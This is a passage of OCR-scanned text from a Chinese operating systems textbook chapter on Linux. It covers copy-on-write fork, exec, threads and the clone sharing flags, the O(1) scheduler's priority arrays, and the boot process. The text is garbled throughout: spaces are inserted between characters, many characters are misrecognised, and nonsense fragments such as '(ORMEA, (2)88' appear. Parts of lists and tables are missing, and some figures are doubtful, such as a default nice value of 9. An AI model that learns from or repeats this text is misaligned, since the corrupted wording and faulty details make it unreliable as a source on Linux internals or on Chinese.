数据 的 时 候 ， 它 会 收 到 写 保护 的 错误 。 内 核发 现 子 进程 的 写 入 行为 之 
后 ， 会 为 子 进 程 分 配 一 个 该 页 面 的 新 副本 ， 并 将 这 个 副本 标记 为 可 读 、 
可 写 。 通 过 这 种 方式 ， 使 得 只 有 需要 写 入 数据 的 页 面 才 会 被 复制 。 这 种 
机 制 叫 做 写 时 复制 。 它 所 融 来 的 额外 好 处 是 ， 不 需要 在 内 存 中 维护 同一 
个 程序 的 两 个 副本 ， 从 而 节省 了 了 RAM。 





























子 进程 开始 运行 之 后 ， 运 行 代码 (shell 的 副本 〉 调用 系统 调用 
exec， 将 命令 名 作为 exec 函 数 的 参数 。 内 核 找到 并 核实 相应 的 可 执行 文 
件 ， 把 参数 和 环境 变量 复制 到 内 核 ， 释 放 旧 的 地 址 空间 和 页 表 。 





现在 必须 建立 并 填充 新 的 地 址 空间 。 如 果 你 使 用 的 系统 像 Linux 系 
统 或 其 他 基于 UNIX 的 系统 一 样 文 持 映 射 文件 ， 新 的 页 表 会 被 创建 ， 并 
指出 所 需 的 页 面 不 在 内 存 中 ， 除 非 用 到 的 页 面 是 堆栈 页 ， 但 是 所 需 的 地 
址 空间 在 磁盘 的 可 执行 文件 中 都 有 备份 。 当 新 进程 开始 运行 的 时 候 ， 它 
会 立刻 收 到 一 个 缺 页 中 断 ， 这 会 使 得 第 一 个 含有 代码 的 页 面 从 可 执行 文 








件 调 入 内 存 。 通 过 这 种 方式 ， 不 需要 预先 加 载 任何 东西 ， 所 以 程序 可 以 
快速 地 开始 运行 ， 只 有 在 所 需 页 面 不 在 内 存 中 时 才 会 发 生 页 面 错误 这 
种 情况 是 第 3 章 中 讨论 的 最 纯粹 的 按 需 分 页 机 制 ) 。 最 后 ， 参 数 和 环境 
变量 被 复制 到 新 的 堆栈 中 ， 信 和 号 被 重 置 ， 寄 存 器 被 全 部 清 零 。 从 这 里 开 
台 ， 新 的 命令 融 可 以 运行 了 。 











图 10-8 通 过 下 面 的 例子 解释 了 上 述 的 步骤 某 用 户 在 终端 键入 一 个 
命令 1s，shell 调 用 fork 函 数 复制 自身 以 创建 一 个 新 进程 。 新 的 shell 调 用 
exec 函 数 用 可 执行 文件 ls 的 内 容 覆 盖 它 的 内 存 。 
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分 配子 进程 任务 数据 结构 寻找 可 执行 程序 
从 父 进程 处 得 到 数据 填写 子 进程 任务 数据 结构 验证 执行 许可 


分 配子 进程 堆栈 和 用 户 空间 

从 父 进 程 处 得 到 数据 填写 子 进程 用 户 空间 
为 子 进程 分 配 PID 

设置 子 进程 以 共享 父 进程 的 正文 

为 数据 和 堆栈 复制 页 表 

设置 共享 打开 文件 

为 子 进程 复制 父 进程 的 寄存 器 


图 10-8 


读 取 和 验证 头 文件 

给 内 核 复制 变量 、 环 境 参 数 
释放 旧 的 地 址 空间 

分 配 新 的 地 址 空间 

为 堆栈 复制 变量 、 环 境 参数 
信号 复位 

初始 化 寄存 器 


shell 执 行 命令 ls 的 步骤 


Linux 中 的 线程 


我 们 在 第 2 章 中 概括 性 的 介绍 了 线程 。 在 这 里 ， 我 们 重点 关注 Linux 
系统 的 内 核 线程 ， 特 别 是 Linux 系 统 中 线程 模型 与 其 他 UNIX 系 统 的 不 同 
之 处 。 为 了 能 更 好 地 理解 Linux 模 型 所 提供 的 独一无二 的 性 能 ， 我 们 先 
来 讨论 一 些 多 线程 操作 系统 中 存在 的 有 和 争议 的 决策 。 


引入 线程 的 最 大 争议 在 于 维护 传统 UNIX 语 义 的 正确 性 。 首 先 来 考 
虑 fork 函 数 。 假 设 一 个 多 (内 核 ) 线程 的 进程 调用 了 fork 系 统 调用 。 所 
有 其 他 的 线程 都 应 该 在 新 进程 中 被 创建 吗 ? 我 们 暂时 认为 答案 是 肯定 
的 。 再 假设 其 他 线程 中 的 其 中 一 个 线程 在 从 键盘 读 取 数 据 时 被 阻塞 。 那 
么 ， 新 进程 中 对 应 的 线程 也 应 该 被 阻 窗 么 ?如 果 是 的 话 ， 那 么 哪 一 个 线 
程 应 该 获得 下 一 行 的 输入 ?如 果 不 是 的 话 ， 新 进程 中 对 应 的 线程 又 应 该 
做 什么 呢 ? 同样 的 问题 还 大 量 存 在 于 线程 可 以 完成 的 很 多 其 他 的 事情 
上 。 在 单线 程 进程 中 ， 由 于 调用 fork 函 数 的 时 候 ， 惟 一 的 进程 是 不 可 能 
被 阻塞 的 ， 所 以 不 存在 这 样 的 问题 。 现 在 ， 考 虑 这 样 的 情况 一 一 其 他 的 
线程 不 会 在 子 进程 中 被 创建 。 再 假设 一 个 没有 在 子 进 程 中 被 创建 的 线程 
持 有 一 个 互 矿 变量， 而 子 进程 中 惟一 的 线程 在 fork 函 数 结束 之 后 要 获得 
这 个 互 斥 变量。 那么 由 于 这 个 互 斥 变量 永远 不 会 被 释放 ， 所 以 子 进程 中 
惟一 的 线程 也 会 永远 挂 起 。 还 有 大 量 其 他 的 问题 存在 。 但 是 没有 简单 的 
解决 办 法 。 




















文件 输入 /输出 是 男 一 个 问题 。 假 设 一 个 线程 由 于 要 读 取 文 件 而 被 


阻 窄 ， 而 为 一 个 线程 天 闭 了 这 个 文件 ， 或 者 调用 lseek 函 数 改变 了 当前 的 
文件 指针 。 下 面 会 发 生 什么 事情 呢 ? 谁 能 知道 ? 


言 号 的 处 理 是 另 一 个 坏 手 的 问题 。 信 号 是 应 该 发 送 给 某 一 个 特定 的 
线程 还 是 发 送 给 线程 所 在 的 进程 呢 ? 一 个 译 点 运算 异常 信号 SIGFPE 应 
该 被 引起 浮 点 运算 寞 第 的 线程 所 捕获 。 但 是 如 果 它 没有 捕获 到 呢 ? 是 应 
该 只 杀 死 这 个 线程 ， 还 是 杀 死 线程 所 属 进程 中 的 全 部 线程 ? 再 来 考虑 由 
用 户 通 过 键盘 输入 的 信号 SIGINT。 哪 一 个 线程 应 该 捕获 这 个 信号 ?所 
有 的 线程 应 该 共 至 同样 的 信号 掩 码 吗 ? 通常 ， 解 决 这 些 或 其 他 问题 的 所 
有 方法 会 引发 为 一 些 问题 。 使 线程 的 语义 正确 (不 涉及 代码 ) 不 是 一 件 
容易 的 事 。 














Linux 系 统 用 一 种 非常 值得 关注 的 有 趣 的 方式 支持 内 核 线 程 。 具 体 
实现 基于 4.4BSD 的 思想 ， 但 是 在 那个 版 本 中 内 核 线程 没 能 实现 ， 因 为 在 
能 够 解决 上 述 问 题 的 C 语 言 程序 库 被 重新 编写 之 前 ，Berkeley 束 资金 短 

RT 





从 历史 观点 上 说 ， 进 程 是 资源 容器 ， 而 线程 是 执行 单元 。 一 个 进程 
包含 一 个 或 多 个 线程 ， 线 程 之 间 共 享 地 址 空间 、 已 打开 的 文件 、 信 和 号 处 
理 函 数 、 和 警报 信号 和 其 他 。 像 上 面 描述 的 一 样 ， 所 有 的 事情 简单 而 清 
晰 。 





2000 年 的 时 候 ，Linux 系 统 引 入 了 一 个 新 的 、 强 大 的 系统 调用 


clone， 模 糊 了 进程 和 线程 的 区 别 ， 甚 至 使 得 两 个 概念 的 重要 性 被 倒置 
任何 其 他 UNIX 系 统 的 版 本 中 都 没有 clone 函 数 。 传 统 观 仿 上 ， 当 一 个 新 
线程 被 创建 的 时 候 ， 之 前 的 线程 和 新 线程 除了 寄存 器 内 容 之 外 共享 所 有 
的 信息 。 特 别 是 ， 已 打开 文件 的 文件 描述 符 、 信 和 号 处 理 函 数 、 和 警报 信和 号 
和 其 他 每 个 进程 《不 是 每 个 线程 ) 都 具有 的 全 局 属性 。clone 函 数 可 以 设 
置 这 些 属性 是 进程 特有 的 还 是 线程 特有 的 。 它 的 调用 方式 如 下 : 

















pid=clone(function,stack ptr,sharing flags,arg); 


调用 这 个 函数 可 以 在 当前 进程 或 新 的 进程 中 创建 一 个 新 线程 ， 具 体 
依赖 于 参数 sharing_flags。 如 果 新 线程 在 当前 进程 中 ， 它 将 与 其 他 已 存 
在 的 线程 共享 地 址 空间 ， 任 何 一 个 线程 对 地 址 空间 做 出 修改 对 于 同一 进 
程 中 的 其 他 线程 而 言 都 是 立即 可 见 的 。 换 句 话 说， 如 条 地 址 空间 不 是 共 
译 的 ， 新 线程 会 获得 地 址 空间 的 完整 副本 ,但 古 新 线程 对 这 个 副本 进行 
的 修改 对 于 旧 的 线程 来 说 是 不 可 见 的 。 这 些 语义 同 POSIX 的 fork 函 数 是 
相同 的 。 


在 这 两 种 情况 下 ， 新 线程 都 从 function 处 开始 执行 ， 并 以 arg 作 为 惟 
一 的 参数 。 同 时 ， 新 线程 还 拥有 私有 堆栈 ， 其 中 私有 堆栈 的 指针 被 初始 
化 为 stack_ptr。 


参数 sharing_flags 古 一 个 位 图 ， 这 个 位 图 允许 比 传统 的 UNIX 系 统 更 
加 细 粒 度 的 共享 。 每 一 位 可 以 单独 设置 ， 且 每 一 位 决定 了 新 线程 是 复制 








一 些 数据 结构 还 是 与 调用 clone 函 数 的 线程 共享 这 些 数 据 结构 。 图 10-9 显 
示 了 根据 sharing_flags 的 设置 ， 哪 些 项 可 以 共享 ， 哪 些 项 需要 复制 。 


置 位 时 的 含义 清除 时 的 含义 
CLONE_VM 创建 一 个 新 线程 创建 一 个 新 进程 


基部 umask、 根 目录 和 工作 目录 


CLONE_FILES 共享 文件 描述 符 复制 文件 描述 符 
CLONE_SIGHAND 共享 信号 句柄 表 
CLONE_PID 新 线程 获得 旧 的 PID 新 线程 获得 自己 的 PID 


CLONE_PARENT 新 线程 与 调用 者 有 相同 的 父亲 新 线程 的 父亲 是 调用 者 





图 10-9 sharing-flags 位 图 中 的 各 个 位 


CLONE_VM 位 决定 了 虚拟 内 存 ( 即 地 址 空间 〉 是 与 旧 的 线程 共享 
还 是 需要 复制 。 如 果 该 位 置 1， 新 线程 加 入 到 已 存在 的 线程 中 去 ， 即 
clone 函 数 在 一 个 已 经 存在 的 进程 中 创建 了 一 个 新 线程 。 如 果 该 位 清 零 ， 
新 线程 会 拥有 私有 的 地 址 空间 。 拥 有 自己 的 地 址 空间 意味 着 存储 的 操作 
对 于 之 前 已 经 存在 的 线程 而 言 是 不 可 见 的 。 这 与 fork 函 数 很 相似 ， 除 了 
下 面 提 到 的 一 点 。 创 建新 的 地 址 空间 事实 上 就 定义 了 一 个 新 的 进程 。 























CLONE_FS 位 控制 着 是 否 共 至 根 目录 、 妆 前 工作 目录 和 umask 标 
志 。 即 使 新 线程 拥有 自己 的 地 址 空间 ， 如 果 该 位 置 1， 新 、 旧 线程 之 间 
也 可 以 共 孚 当前 工作 目录 。 这 就 意味 着 即 使 一 个 线程 拥有 上 自己 的 地 址 衬 
间 ， 男 一 个 线程 也 可 以 调用 chdir 函 数 改变 它 的 工作 目录 。 在 UNIX 系 统 
中 ， 一 个 线程 通常 会 调用 chdir 函 数 改变 它 所 在 进程 中 其 他 线程 的 当前 工 
作 目 录 ， 而 不 会 对 男 一 进程 中 的 线程 做 这 样 的 操作 。 所 以 说 ， 这 一 位 引 























入 了 一 种 传统 UNIX 系 统 不 可 能 具有 的 共享 性 。 


CLONE_FILES 位 与 CLONE_FS 位 相似 。 如 果 该 位 置 1， 新 线程 与 旧 
线程 共享 文件 描述 符 ， 所 以 一 个 线程 调用 lseek 函 数 对 另 一 个 线程 而 言 是 
可 见 的 。 通 常 ， 这 样 的 处 理 是 对 于 同属 一 个 进程 的 线程 ， 而 不 是 不 同 进 
程 的 线程 。 相 似 的 ，CLONE_SIGHAND 位 控制 是 否 在 新 、 旧 线程 间 共 
享 信号 句柄 表 。 如 果 信和 号 处 理 函 数 表 是 共享 的 ， 即 使 是 在 拥有 不 同 地 址 
空间 的 线程 之 间 共 享 ， 一 个 线程 改变 某 一 处 理 函 数 也 会 影响 另 一 个 线程 
的 处 理 函 数 。CLONE_PID 位 控制 新 线程 是 拥有 自己 的 PID 还 是 与 父 进程 
共享 PID。 这 个 特性 在 系统 启动 的 时 候 是 必需 的 。 用 户 进程 不 多 许 对 该 
位 进行 设置 。 




















最 后 ， 每 一 个 进程 都 有 一 个 父 进程 。CLONE_PARENT 位 控制 着 哪 
一 个 线程 是 新 线程 的 父 线程 。 父 线程 可 以 与 clone 函 数 调用 者 的 父 线程 相 
同 ( 在 这 种 情况 下 ， 新 线程 是 clone 函 数 调 用 者 的 兄弟 ) ， 也 可 以 是 
clone 函 数 调 用 者 本 身 ， 在 这 种 情况 下 ， 新 线程 是 clone 函 数 调 用 者 的 子 
线程 。 还 有 另外 一 些 控制 其 他 项 目的 位 ， 但 是 它们 不 是 很 重要 。 


由 于 Linux 系 统 为 不 同 的 项 目 维护 了 独立 的 数据 结构 〈 见 10.3.3 小 
节 ， 如 调度 参数 、 内 存 映射 等 ) ， 因 此 细 粒 度 的 共享 成 为 了 可 能 。 任 务 
数据 结构 只 需要 指向 这 些 数据 结构 即 可 ， 所 以 为 每 一 个 线程 创建 一 个 新 
的 任务 数据 结构 变 得 很 容易 ， 或 者 使 它 指向 旧 线 程 的 调度 参数 、 内 存 映 
财 和 其 他 的 数据 结构 ， 或 者 复制 它们 。 事 实 上 ， 条 理 分 明 的 共 至 性 虽然 




















成 为 了 可 能 ， 但 并 不 意味 着 它 是 有 益 的 ， 毕 竟 传 统 的 UNIX 系 统 都 没有 
提供 这 样 的 功能 。 一 个 利用 了 这 种 共享 性 的 Linux 程 序 将 不 能 移植 到 
UNIX 系 统 上 。 


Linux 系 统 的 线程 模型 带 来 了 另 一 个 难题 。UNIX 系 统 为 每 一 个 进程 
分 配 一 个 独立 的 PID， 不 论 它 是 单线 程 的 进程 还 是 多 线程 的 进程 。 为 了 
能 与 其 他 的 UNIX 系 统 兼容 ，Linux 对 进程 标识 符 (PID) 和 任务 标识 符 
(TID) 进行 了 区 分 。 这 两 个 分 量 都 存储 在 任务 数据 结构 中 。 当 调用 
clone 函 数 创建 一 个 新 进程 而 不 需要 和 旧 进 程 共享 任何 信息 时 ，PID 被 设 
置 成 一 个 新 值 ; 否则 ， 任 务 得 到 一 个 新 的 任务 标识 符 ， 但 是 PID 不 变 。 
这 样 一 来 ， 一 个 进程 中 所 有 的 线程 都 会 拥有 与 该 进程 中 第 一 个 线程 相同 
的 PID。 





10.3.4 ”Linux 中 的 调度 


现在 我 们 来 关注 Linux 系 统 的 调度 算法 。 首 先 要 认识 到 ，Linux 系 统 
的 线程 是 内 核 线 程 ， 所 以 Linux 系 统 的 调度 是 基于 线程 的 ， 而 不 是 基于 
进程 的 。 








为 了 进行 调度 ，Linux 系 统 将 线程 区 分 为 三 类 : 
1) 实 时 先入 先 出 。 


2) 实 时 轮转 。 





实时 先入 先 出 线程 有 具有 最 高 优先 级 ， 它 不 会 被 其 他 线程 抢占 ， 除 非 
那 是 一 个 刚刚 准备 好 的 、 拥 有 更 高 优先 级 的 实时 先入 先 出 线程 。 实 时 轮 
转 线程 与 实时 先入 先 出 线程 基本 相同 ， 只 是 每 个 实时 轮转 线程 都 有 一 个 
时 间 量 ， 时 间 到 了 之 后 就 可 以 被 抢占 。 如 果 多 个 实时 轮转 线程 都 准备 好 
了 ， 每 一 个 线程 运行 它 的 时 间 量 所 规定 的 时 间 ， 然 后 插入 到 实时 轮转 线 
程 列表 的 末尾 。 事 实 上 ， 这 两 类 线程 都 不 是 真正 的 实时 线程 。 执 行 的 最 
后 期 限 无 法 确定 ， 更 无 法 保证 最 后 期 限 前 线程 可 以 执行 完毕 。 这 两 类 线 
程 比 起 分 时 线程 来 说 只 是 具有 更 高 的 优先 级 而 已 。Linux 系 统 之 所 以 称 
它们 为 “实时 ”是 因为 Linux 系 统 遵 循 的 P1003.4 标 准 (“UNIX 系统 对 “ 实 














时 ”含义 的 扩展 ) 使 用 了 这 个 名 称 。 在 系统 内 部 ， 实 时 线程 的 优先 级 从 0 
到 99，0 是 实时 线程 的 最 高 优先 级 ，99 是 实时 线程 的 最 低 优先 级 。 





传统 的 非 实 时 线程 按照 如 下 的 算法 进行 调度 。 在 系统 内 部 ， 非 实时 
线程 的 优先 级 从 100 到 139， 也 就 是 说 ， 在 系统 内 部 ，Linux 系 统 区 分 140 
级 的 优先 级 (包括 实时 和 非 实 时 任务 ) 。 就 像 实 时 轮转 线程 一 样 ， 
Linux 系 统 根 据 非 实 时 线程 的 优先 级 分 配 时 间 量 。 这 个 时 间 量 是 线程 可 
以 连续 运行 的 时 钟 周期 数 。 在 当前 的 Linux 版 本 中 ， 时 钟 频率 为 1000 赫 
效 ， 每 个 时 钟 周期 为 1ms， 也 叫做 一 个 最 小 时 间 间 隅 (jiffy〉。 








像 大 多 数 UNIX 系 统一 样 ，Linux 系 统 给 每 个 线程 分 配 一 个 nice 值 
( 即 优先 级 调节 值 》。 默 认 值 是 9， 但 是 可 以 通过 调用 系统 调用 
nice (value〉 来 修改 ， 修 改 值 的 范围 从 -20 到 +19。 这 个 值 决 定 了 线程 的 
静态 优先 级 。 一 个 在 后 台大 量 计算 n 值 的 用 户 可 以 在 他 的 程序 里 调用 这 
个 系统 调用 为 其 他 用 户 让 出 更 多 计算 资源 。 只 有 系统 管理 员 可 以 要 求 比 
普通 服务 更 好 的 服务 (意味 着 nice 函 数 参 数值 的 范围 从 -20 到 -1〉 。 推 断 
这 条 规则 的 理由 作为 练习 留 给 读者 。 








Linux 调 度 算 法 使 用 一 个 重要 的 数据 结构 一 一 调度 队列 。 在 系统 
中 ， 一 个 CPU 有 一 个 调度 队列 ， 除 了 其 他 信息 ， 调 度 队 列 中 有 两 个 数 
组 ， 一 个 是 正在 活动 的 ， 一 个 是 过 期 失效 的 。 如 图 10-10 所 示 ， 这 两 个 
分 量 都 是 指向 数组 的 指针 ， 每 个 数组 都 包含 了 140 个 链表 头 ， 每 个 链表 
共有 不 同 的 优先 级 。 链 表 头 指 同 给 定 优先 级 的 双 同 进程 链表 。 调 度 的 基 





本 操作 如 下 所 述 。 


每 个 CPU 上 的 调度 队列 













CPU 
静态 优先 级 
活动 (数组 ) 


过 期 (数组) 
优先 级 0 


数组 [0] 
P) (P) 优先 级 139 
优先 级 0 

数组 [1] 


优先 级 139 
图 10-10 Linux 调 度 队 列 和 优先 级 数组 


调度 器 从 正在 活动 数组 中 选择 一 个 优先 级 最 高 的 任务 。 如 采 这 个 任 
务 的 时 间 片 “时 间 量 ) 过 期 失效 了 ， 残 把 它 移动 到 过 期 失效 数组 中 (可 
能 会 插入 到 优先 级 不 同 的 列表 中 ) 。 如 果 这 个 任务 阻塞 了 ， 比 如 说 正在 
等 待 O 事 件 ， 那 么 在 它 的 时 间 片 过 期 失效 之 前 ， 一 旦 所 等 竺 的 事件 发 
生 ， 任 务 就 可 以 继续 运行 ， 它 将 被 放 回 到 之 前 正在 活动 的 数组 中 ， 时 间 








乒 根据 它 所 消耗 的 CPU 时 间 相 应 的 减少 。 一 旦 它 的 时 间 厂 消耗 殖 尽 ， 它 
也 会 被 放 到 过 期 失效 数组 中 。 当 正在 活动 数组 中 没有 其 他 的 任务 了 ， 调 
度 器 交换 指针 ， 使 得 正在 活动 数组 变 为 过 期 失效 数组 ， 过 期 失效 数组 变 
为 正在 活动 数组 。 这 种 方法 可 以 保证 低 优先 级 的 任务 不 会 被 钱 死 《除非 
实时 先入 先 出 线程 完全 占用 CPU， 但 是 这 种 情况 是 不 会 发 生 的 ) 。 





不 同 的 优先 级 被 赋予 不 同 的 时 间 片 长 度 。Linux 系 统 会 赋予 高 优先 
级 的 进程 较 长 的 时 间 厂 。 例 如 ， 优 先 级 为 100 的 任务 可 以 得 到 800ms 的 时 
间 片 ， 而 优先 级 为 139 的 任务 只 能 得 到 5ms 的 时 间 厂 。 


这 种 调度 模式 的 思想 是 为 了 使 进程 更 快 地 出 入 内 核 。 如 果 一 个 进程 
试图 读 取 一 个 磁盘 文件 ， 在 调用 read 函 数 之 间 等 待 一 秒 钟 的 时 间 显 然 会 
极 大 地 降低 进程 的 效率 。 每 个 请 求 完成 之 后 让 进程 立即 运行 的 做 法 会 好 
得 多 ， 同 时 这 样 做 也 可 以 使 下 一 个 请 求 更 快 的 完成 。 相 似 地 ， 如 果 一 个 
进程 因为 等 竺 键盘 输入 而 阻塞 ， 那 么 它 明 显 是 一 个 交互 进程 ， 这 样 的 进 
程 只 要 准备 好 运行 后 就 应 当 被 赋予 较 高 的 优先 级 ， 从 而 保证 交互 进程 可 
以 提供 较 好 的 服务 。 在 这 种 情况 下 ， 当 IO 密集 进程 和 交互 进程 被 阻 压 
之 后 ，CPU 密 集 进程 基本 上 可 以 得 到 所 有 被 留 下 的 服务 。 





由 于 Linux 系 统 ( 或 其 他 任何 操作 系统 ) 事先 不 知道 一 个 任务 完 竟 
征 IO 密 集 的 ， 还 是 CPU 密集 的 ， 它 只 是 依赖 于 连续 保持 的 互动 启发 模 
式 。 通 过 这 种 方式 ，Linux 系 统 区 分 静态 优先 级 和 动态 优先 级 。 线 程 的 
动态 优先 级 不 断 地 被 重新 计算 ， 其 目的 在 于 : (ORMEA, (2)88 


罚 占 用 CPU 的 进程 。 最 高 的 优先 级 奖励 是 -5， 古 从 调度 器 接收 的 与 更 高 
优先 级 相对 应 的 较 低 优先 级 的 值 。 最 局 的 优先 级 惩罚 是 +5。 





说 得 更 详细 些 ， 调 度 器 给 每 一 个 任务 维护 一 个 名 为 sleep_avg 的 变 
。 每 当 任 务 被 唤醒 时 ， 这 个 变量 会 增加 ， 当 任务 被 抢占 或 时 间 量 过 期 
时 ， 这 个 变量 会 相应 地 减少 。 减 少 的 值 用 来 动态 生成 优先 级 奖励 ， 奖 励 
的 范围 从 -5 到 +5。 当 一 个 线程 从 正在 活动 数组 移动 到 过 期 失效 数组 中 
时 ，Linux 系 统 的 调度 器 会 重新 计算 它 的 优先 级 。 





val 





这 里 讲述 的 调度 算法 指 的 是 2.6 版 本 内 核 ， 最 初 引 入 这 个 调度 算法 
的 是 不 稳定 的 2.5 厂 本 内 核 。 早 期 的 调度 算法 在 多 处 理 圳 环境 中 所 表现 
的 性 能 十 分 低下 ， 并 且 当 任务 的 数量 大 量 增长 时 ， 不 能 很 好 地 进行 调 
度 。 由 于 上 面 描述 的 内 容 说 明了 通过 访问 正在 活动 数组 就 可 以 做 出 调度 
决定 ， 那 么 调度 可 以 在 一 个 固定 的 时 间 O〈1) 内 完成 ， 而 与 系统 中 进 
程 的 数量 无 关 。 








男 外 ， 调 上 度 占 包含 了 对 于 多 处理 融和 多 核 平 台 而 言 非常 有 益 的 特 
性 。 首 先 ， 在 多 处 理 器 平台 上 ， 运 行 队列 数据 结构 与 菜 一 个 处 理 器 相对 
应 ， 调 度 器 尽量 进行 茶 和 调度 ， 即 将 之 前 在 茶 个 处 理 器 上 运行 过 的 任务 
再 次 调 入 该 处 理 器 。 第 二 ， 为 了 更 好 地 描述 或 修改 一 个 选 定 的 线程 对 杀 
和 性 的 要 求 ， 有 一 组 系统 调用 可 供 调用 。 最 后 ， 在 满足 特定 性 能 和 杀 和 
要 求 的 前 担 下 ， 调 度 右 实现 在 不 同 处 理 右 上 阶段 性 地 加 载 平 衡 ， 从 而 保 
证 整个 系统 的 加 载 是 平衡 的 。 


调度 器 只 考虑 可 以 运行 的 任务 ， 这 些 任务 个 放 在 适当 的 调度 队列 当 
中 。 不 可 运行 的 任务 和 正在 等 待 各 种 1/O 操 作 或 内 核 事 件 的 任务 被 放 入 
男 一 个 数据 结构 当中 ， 即 等 竺 队列。 每 一 种 任务 可 能 需要 等 待 的 事件 对 
应 了 一 个 等 竺 队列。 等待 队列 的 头 包含 一 个 指 加 任务 链表 的 指针 及 一 枚 
目 旋 锁 。 为 了 保证 等 待 队 列 可 以 在 主 内 核 代码 、 中 断 处 理 函数 或 其 他 弄 
步 处 理 请 求 代 码 中 进行 并 发 操作 ， 目 旋 锁 是 非常 必要 的 。 








10.3.5 ”启动 Linux 系 统 


每 个 平台 的 细节 都 有 不 同 ， 但 是 整体 来 说 ， 下 面 的 步骤 代表 了 启动 
的 过 程 。 当 计算 机 启动 时 ，BIOS 加 电 自 检 (POST) ， 并 对 硬件 进行 检 
测 和 初始 化 ， 这 是 因为 操作 系统 的 启动 过 程 可 能 会 依赖 于 磁盘 访问 、 屏 
幕 、 键 盘 等 。 接 下 来 ， 启 动 磁 盘 的 第 一 个 扇 区 ， 即 主 引 导 记 录 
(MBR) ， 被 读 入 到 一 个 固定 的 内 存 区 域 并 且 执 行 。 这 个 分 区 中 含有 
一 个 很 小 的 程序 (只 有 512 字 节 〉 ， 这 个 程序 从 启动 设备 中 ， 通 常 是 IDE 
或 SCSI 磁 租 ， 调 入 一 个 名 为 boot 的 独立 程序 。boot 程 序 将 自身 复制 到 高 
地 址 的 内 存 当 中 从 而 为 操作 系统 释放 低地 址 的 内 存 。 











复制 完成 后 ，boot 程 序 读 取 局 动 设备 的 根 目 录 。 为 了 达到 这 个 目 
的 ，boot 程 序 必须 能 够 理解 文件 系统 和 目录 格式 ， 这 个 工作 通常 由 引导 
程序 ， 如 GRUB 《多 系统 启动 管理 器 ) ， 来 完成 。 其 他 流行 的 引导 程 
序 ， 如 Intel 的 LILO， 不 依赖 于 任何 特定 的 文件 系统 。 相 反 ， 他 们 需要 一 
个 块 映 射 岁 和 低层 地 址 ， 他 们 描述 了 物理 虱 区 、 磁 头 和 磁道 ， 可 以 帮助 
找到 相应 的 需要 被 加 载 的 而 区 。 





然后 ，boot 程 序 读 入 操作 系统 内 核 ， 并 把 控制 交 给 内 核 。 从 这 里 开 
始 ，boot 程 序 完成 了 它 的 任务 ， 系 统 内 核 开 始 运行 。 





内 核 的 开始 代码 是 用 汇编 语言 写成 的 ， 具 有 较 高 的 机 器 依赖 性 。 主 


要 的 工作 包括 创建 内 核 堆 栈 、 识 别 CPU 类 型 、 计 算 可 用 内 存 、 茶 用 中 
岂 、 启 用 内 存 管 理 蛙 元 ， 最 后 调用 C 语 言 写成 的 main 函 数 开始 执行 操作 
系统 的 主要 部 分 





C 语 言 代 码 也 有 相当 多 的 初始 化 工作 要 做 ， 但 是 这 些 工作 更 逻辑 化 
(而 不 是 物理 化 )。C 语 言 代码 开始 的 时 候 会 分 配 一 个 消息 缓冲 区 来 帮 
助 调试 局 动 出 现 的 问题 。 随 着 初始 化 工作 的 进行 ， 信 息 补 写 入 消 明 缓 冲 
区 ， 这 些 信息 与 当前 正在 发 生 的 事件 相关 ， 所 以 ， 如 果 出 现 局 动 失败 的 
情况 ， 这 些 信息 可 以 通过 一 个 特殊 的 诊断 程序 调 出 来 。 我 们 可 以 把 它 当 
作 是 操作 系统 的 “飞行 信息 记录 器 ”(〈 即 空难 发 生 后 ， 侦 查 员 寻找 的 黑 盒 
$s 

















接 下 来 ， 内 核 数 据 结 构 得 到 分 配 。 大 部 分 内 核 数 据 结构 的 大 小 是 固 
定 的 ， 但 是 一 少 部 分 ， 如 页 面 缓存 和 特殊 的 页 表 结 构 ， 依 赖 于 可 用 内 存 
的 大 小 。 


从 这 里 开始 ， 系 统 进行 自动 配置 。 使 用 描述 何 种 设备 可 能 存在 配置 
文件 ， 系 统 开始 探测 哪些 设备 是 确实 存在 的 。 如 果 一 个 被 探测 的 设备 给 
出 了 响应 ， 这 个 设备 就 会 被 加 入 到 已 连接 设备 表 中 。 如 果 它 没有 响应 ， 
就 假设 它 未 连接 或 直接 忽略 掉 它 。 不 同 于 传统 的 UNIX 版 本 ，Linux 系 统 
的 设备 驱动 程序 不 需要 静态 链接 ， 它 们 可 以 被 动态 加 载 〈 就 像 所 有 的 
MS-DOS 和 Windows 版 本 一 样 ) 。 











关于 文 持 和 反对 动态 加 载 驱 动 程序 的 争论 非常 有 趣 ， 值 得 简要 地 盖 
述 一 下 。 动 态 加 载 的 主要 论点 是 同样 的 二 进 制 文件 可 以 分 发 给 具有 不 
系统 配置 的 用 户 ， 这 个 二 进 制 文件 可 以 自动 加 载 它 所 需要 的 驱动 程序 ， 
甚至 可 以 通过 网 络 加 载 。 反 对 动态 加 载 的 主要 论点 是 安全 。 如 果 你 正在 
一 个 安全 的 环境 中 运行 计算 机 ， 比 如 说 银行 的 数据 库 系 统 或 者 公司 的 网 
络 服务 器 ， 你 肯定 不 希望 其 他 人 问 内 核 中 插入 随机 代码 。 系 统管 理 员 可 
以 在 一 个 安全 的 机 器 上 保存 系统 的 源 文 件 和 目标 文件 ， 在 这 人 台 机 需 上 完 
成 系统 的 编译 链接 ， 然 后 通过 局 域 网 把 内 核 的 二 进 制 文件 分 发 给 其 他 的 
机 器 。 如 宋 驱 动 程序 不 能 被 动态 加 载 ， 这 就 阻止 了 那些 知道 超级 用 户 密 
码 的 计算 机 使 用 者 或 其 他 人 问 系 统 内 核 注 入 恶意 或 漏洞 代码 。 而 且 ， 在 
大 的 站 点 中 ， 系 统 编译 链接 的 时 候 便 件 配置 都 是 已 知 的 。 需 要 重新 链接 
系统 的 变化 非常 罕见 ， 即 使 是 在 系统 中 添加 一 个 硬件 设备 也 不 是 问题 。 


可 














一 旦 所 有 的 硬件 都 配置 好 了 ， 接 下 来 要 做 的 事情 就 是 细心 地 手动 运 
行进 程 0， 建 立 它 的 扒 栈 ， 运 行 它 。 进 程 0 继续 进行 初始 化 ， 做 如 下 的 工 
作 : 配置 实时 时 钟 ， 挂 载 根 文件 系统 ， 创 建 init 进 程 ( 进 程 1) 和 页 面 守 
护 进程 (进程 2)〉。 





init 进 程 检 测 它 的 标志 以 确定 它 应 该 为 单 用 户 还 是 多 用 户 服 务 。 前 
一 种 情况 ， 它 调用 fork 函 数 创 建 一 个 shell 进 程 ， 并 且 等 待 这 个 进程 结 
束 。 后 一 种 情况 ， 它 调用 fork 函 数 创 建 一 个 运行 系统 初始 化 shell 脚 本 
( 即 /etc/rc〉 的 进程 ， 这 个 进程 可 以 进行 文件 系统 一 致 性 检测 、 挂 载 附 


